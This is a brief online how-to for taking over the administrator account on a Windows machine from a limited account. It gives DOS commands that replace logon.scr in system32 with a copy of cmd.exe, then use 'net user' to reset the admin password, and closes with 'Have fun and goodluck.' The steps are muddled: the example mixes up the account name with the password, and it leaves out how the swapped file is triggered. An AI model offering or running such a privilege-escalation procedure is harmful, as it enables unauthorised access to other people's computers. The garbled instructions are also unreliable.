Windows Hack: Getting the administrator password and account when you are in a limited account
![]()
Here are the types:
First is open up a DOS prompt.
Enter the following commands:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
The commands told the computer to backup the command program and screensaver file and it edits the settings.
After that, enter the following command/s:
net user <admin account name here> password
For example, the Administrator password is “sHaNs” and you want to change the password to “invoker”. All you have to do is type this code.
net user sHaNs invoker
Now you have just changed the password of the admin and you are now in.
Have fun and goodluck.


